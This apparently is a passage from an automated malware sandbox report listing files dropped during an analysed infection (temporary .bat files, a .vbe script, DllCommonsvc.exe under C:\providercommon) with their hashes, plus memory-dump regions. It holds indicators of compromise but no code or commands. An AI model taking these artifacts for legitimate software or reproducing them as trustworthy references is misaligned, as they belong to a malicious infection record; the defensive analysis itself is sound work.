bc257d8248c1569a4399d4f51faf4b5e6fab07c189976c40c0928067244bf8f3

SHA512
6cbf443f533c640248a2bdc2c7de241e8c005987876178052ccaf8a04189435762efaaf58089a857b51e53321100c4247c3f25d02744dff5c1169c4233633fb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab51AB.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\DJG58brWjr.bat

Filesize
226B

MD5
b742fa8317ccfed8ba279631520b204b

SHA1
4f5a53b4c63573810e1c79aa7591d1a392e3685a

SHA256
929ae5cd156d9e8aa969eb5ecd3789aeef0743bf113ff954f1f86e7cbf7525a0

SHA512
c19d8c65496d77d3e01d95ceb13d14e1f876e2632ab3737a57002265ce0731815a1730f0b9f0ad980668f2e208b71182abf3a96441c72df7cb71ef62e5d7d467

Download Submit
C:\Users\Admin\AppData\Local\Temp\RBc6fQQaMD.bat

Filesize
199B

MD5
11a0c74ee5f35d6c4ce0ccad06a3ef6b

SHA1
402bc1b6a2386d8367c7d72c36d1dc899c039d1e

SHA256
2ca7f805462941279db7a24d99025d2f1d6cc4fb5be0e1620d66b8f4570acde9

SHA512
3c8e40bb58ba6e839d605328e322a32feb2c3694980d9f0459c1acda57a98d6a6d31f836224d9675486e6ded0bada1fe5ab1ebe9d529e1a81c3be40a6e3286d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar51FC.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\WtKWrLEt72.bat

Filesize
226B

MD5
f001a846abafd5148a14ca7cca53dd64

SHA1
8d358a5dda4c0b23deb59e50e6890a7a9802ed21

SHA256
5a6942a491db25cb3b9fe0e215a83b94905c7cb0d8a47939ac273711ec543f4d

SHA512
50ae4d2db247ae60a8512eca00b3ebfc4d2248632fa6934dbeacabd9216e084867af8d2af0f4ff4b90f4030ecdb3b747fb063907839b5a266f7638026412299e

Download Submit
C:\Users\Admin\AppData\Local\Temp\bf2k7CZMYL.bat

Filesize
226B

MD5
8f5ec576d66416eb22ccf3b55ed12d98

SHA1
8ff4d9b7a159824348b3de7a997793eb3783081f

SHA256
a6fad555c42968082d57e1feac4c8eb481a9e269b258b23279391b7e331388f4

SHA512
97fce1b85a1e5b43d3a9eb1e4d819ac9fd1e9da87ff038666e78cb044264a844df76e83c3e3ab7e762ae99c50f9f80ad4c5ed4c657afe5ed1a68de81b2356d02

Download Submit
C:\Users\Admin\AppData\Local\Temp\cU7BGbiaqd.bat

Filesize
226B

MD5
a7994c2c3525b2097a82630330294ffc

SHA1
26227e2859cae4b335191a5098bd93486be255c6

SHA256
2ae2f6d803e585792d45db42287b98c63cf67cc02f7318c1b66015d480340e85

SHA512
89d9acffab8c0d581182b03301b1fe12877d4763c7d8d4303963841c3792ac335039b167d1354cc39764a8c16f9805e2a5548d8cf7e5beff750289ae6a466297

Download Submit
C:\Users\Admin\AppData\Local\Temp\tGPC7CVf0d.bat

Filesize
226B

MD5
697becee82d8c1b52aef0a7757c0f895

SHA1
712bbb686d035f8df6940eb628160fab443d646b

SHA256
eaba1bbfddd10f9e6c2f74eca4347afa793be385256abcd560643f6aa9912647

SHA512
a7b74bd7ac1cf90d66ec7ae95a14ecb28c9a221f6f16cd0aa94fc6d57fcf73842c6613866494872c2fe214286a3126e59e751404e39b8b9131f3cea8101e1082

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1c9d7de81a88c62772b3c08033d544d4

SHA1
edc6182f3bc118e6612142ba0dd492872e7efe05

SHA256
85b1d7b962f1c4b5917e53df2d2950984cd8d3e987cbb66166d4c0e7d91fead8

SHA512
d37f03fbe5cdc8a0be13cc849aa39f66d1a022d963921174d331c176947729db01c189b3328b6c0495aad942af4ae5d8af791baaefcf69b03fddbd97dd48a393

Download Submit
C:\providercommon\1zu9dW.bat

Filesize
36B

MD5
6783c3ee07c7d151ceac57f1f9c8bed7

SHA1
17468f98f95bf504cc1f83c49e49a78526b3ea03

SHA256
8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

SHA512
c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

Download Submit
C:\providercommon\27d1bcfc3c54e0

Filesize
285B

MD5
53fcf658382c6d65d1af012edfb3a63c

SHA1
b8d38fc9a0c40715d0e5e532d5151c7e53e093b8

SHA256
c8e196c984bbded531cd82a4672ca17a13463148055cfa9ada01880ebe85707d

SHA512
9b6fca32b2a061c563b520f826dbe7b0d3786c783b743fbbe63ef7c766b06fad18bb482c4849c36695b51934db52acb93e0f1ca2655c3f5f87d23ef5cf4e3f77

Download Submit
C:\providercommon\DllCommonsvc.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

Filesize
197B

MD5
8088241160261560a02c84025d107592

SHA1
083121f7027557570994c9fc211df61730455bb5

SHA256
2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

SHA512
20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

Download Submit
memory/524-320-0x0000000001360000-0x0000000001470000-memory.dmp

Filesize
1.1MB

Download
memory/624-177-0x000000001B490000-0x000000001B772000-memory.dmp

Filesize
2.9MB

Download
memory/624-187-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/920-619-0x0000000001390000-0x00000000014A0000-memory.dmp

Filesize
1.1MB

Download
memory/920-620-0x00000000004C0000-0x00000000004D2000-memory.dmp

Filesize
72KB

Download
memory/1104-197-0x0000000001210000-0x0000000001320000-memory.dmp

Filesize
1.1MB

Download
memory/1104-202-0x00000000002D0000-0x00000000002E2000-memory.dmp

Filesize
72KB

Download
memory/1376-440-0x0000000001170000-0x0000000001280000-memory.dmp

Filesize
1.1MB

Download
memory/2540-380-0x00000000002A0000-0x00000000003B0000-memory.dmp

Filesize
1.1MB

Download
memory/2880-559-0x0000000000240000-0x0000000000252000-memory.dmp

Filesize
72KB

Download
memory/2892-150-0x0000000000FE0000-0x00000000010F0000-memory.dmp

Filesize
1.1MB

Download
memory/3060-16-0x0000000000250000-0x000000000025C000-memory.dmp

Filesize
48KB

Download
memory/3060-15-0x0000000000360000-0x000000000036C000-memory.dmp

Filesize
48KB

Download
memory/3060-14-0x0000000000240000-0x0000000000252000-memory.dmp

Filesize
72KB

Download
memory/3060-13-0x0000000000C30000-0x0000000000D40000-memory.dmp

Filesize
1.1MB

Download
memory/3060-17-0x0000000000350000-0x000000000035C000-memory.dmp

Filesize
48KB

Download
memory/3064-87-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

Filesize
32KB

Download
memory/3064-86-0x000000001B230000-0x000000001B512000-memory.dmp

Filesize
2.9MB

Download